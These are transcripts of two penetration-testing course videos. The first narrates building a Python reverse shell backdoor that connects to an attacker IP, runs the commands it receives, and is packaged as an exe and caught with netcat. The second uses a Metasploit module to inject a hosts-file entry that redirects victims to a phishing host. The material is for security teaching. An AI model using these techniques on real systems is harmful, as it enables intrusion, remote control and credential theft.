Windows 7 box where I've installed Python and PyInstaller. So if you haven't installed Python or PyInstaller, view previous videos where I talk about them in this series. So I'm first going to import the socket module and then the subprocess module. Now the first thing is to open a network socket. This can easily be accomplished by socket.socket. Basically address family AF_INET, and socket type will be sock_stream, which is for TCP sockets. Then I'm going to connect using this socket to the remote machine. This takes in a tuple, which is the IP address of the remote machine. Let's assume it's 1.10 and at port number 9999, right? This is the attacker machine. Now let me receive the first data. And now let's run a short loop till the time we are receiving data from the client, that is the socket is up and running. And inside this, I'm just going to put a very simple exception handler. And here is what I want, right? The data the client or the attacker sends us, we want to run it locally as a command on the shell and send back the response, right? So one of the ways really is to use the check underscore output method, which is there in subprocess, pass on the data, and then we mention shell equals true, just so that this is passed to the shell. Now, if you look at Dave's code, he's done a lot of other interesting things. Rather than use check output, he's basically opened a pipe. You can look at that code as well, right? This is a very simplistic version, just so that I can show you how easy it is. Now, basically, we send the output back to the attacker. And if there are any exceptions, I'm just going to pass them from now, which is really not bother about the exception. And then I'm going to continue receiving data from the socket. Finally, I'm just going to try and close this gracefully. So I've saved this as backdoor connect shell.py. Let me quickly check this just to ensure everything is correct. And you should ideally type along with me, just so that you can get a hang of the syntax. Okay, 1.10 blah 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 blah, subprocess.check underscore output. Looks okay. In the Python course, we've covered subprocess, check underscore output, and all of that, in case you want to look at it later. Great. Now here's what I'm going to do. I'm going to use PyInstaller to basically convert this Python script into a single exe file. There we go. So this is basically converting it into an exe, a standalone one which we can use, and this is stored under the dist, that is the distribution directory inside PyInstaller. So here we are, right? Backdoor connect shell. Now I go back to my attacker machine. And by the way, the Trusted Sec website, the link is here. So try out the reverse shell, PyBuild, and a couple of others. Coming back here, let me run a netcat listener on port 9999, verbose mode. Go back to the victim machine, execute the backdoor. And if we go in here, we get a reverse connection, right? And type in dir, there we are. Create a directory called hacked. Let's do a dir again. We can now clearly see hacked is here. Let's do a remove dir, hacked, and so on and so forth, right? You can play along with this. Basically, you have a reverse connect shell which has connected back to the attacker's machine. And as you can well imagine, you've accomplished all of that in just a couple of lines of Python, right? So that's all I had in mind for this video. I would recommend that go through the Python course on Pentester Academy and try and modify this to remove, the console, to do a lot of fun things and create your own backdoor. So that's all I had in mind for this video. If you're enjoying your time here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Network Pen Testing course at Pentester Academy. In this video, we will look at DNS-based poisoning using the hosts file. Now, if you don't already know, the host file defines a static binding between hostname and IP addresses. Now, for any hostname in there, DNS resolving does not happen. Rather, the IP address which has been mentioned in the host file is used. Now, as you can imagine, a lot of malware take advantage of the hosts file and go ahead and for certain websites like banking sites, etc., may point the IP address to websites where clones and phishing sites have been set up. Now let's actually jump into Windows for a bit and look at the host file. Now on Windows 7 it is under C drive, Windows, System32, drivers, etc. And there you have the hosts file. If you open up using Notepad, let's copy this out. Right? If you notice, by default there are no entries and the computer relies on DNS resolution. But however, once you go ahead and put anything in there, your computer is going to use that IP address rather than doing a DNS query. So one of the post exploitations which can be done is adding a malicious entry in the host file and then having the victim connect back to the attacker. Now I have already broken into the Windows 7 machine, and we've taken up many examples in previous videos in this series which you can have a look at. So I already have a Meterpreter session running, and I'm going to go ahead and tamper with the host file over this Meterpreter session. So I'm going to use a post module, use post Windows, manage, and after that the option which I'm going to use is inject host. Let's look at the different options which are available. Right, you have a domain, an IP address, and the session ID. Now I've tested this before, so there are current settings. In yours these may be pretty much clean slate. So let's actually set the domain as an example to securitytube.net. We set the IP to the attacker IP address, which is 1.10, and session would be your Meterpreter session number, which in my case is 2, maybe different for yours. And let's hit exploit. Now if we go back to the Windows 7 machine, open up the host file, we'll actually find a new entry added for securitytube.net 192.168.1.10, and if we now try to hit securitytube.net right, you would notice that the computer is actually connecting to 1.10. Now the same thing would be applicable even if you use the browser. So one could go in, put in securitytube.net, and they get redirected to the attacker machine. Right, of course I could have a full-blown phishing page and whatnot in here to confuse the victim, and maybe he ends up giving out his username, password, and other things for the website. Right, fantastic. So this is very, very handy, especially in the post-exploitation phase. You probably want to go ahead and have the victim now connect to you for certain hosts, and inject_host allows you to do that. So hope you guys enjoyed this video, and if you're having fun at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.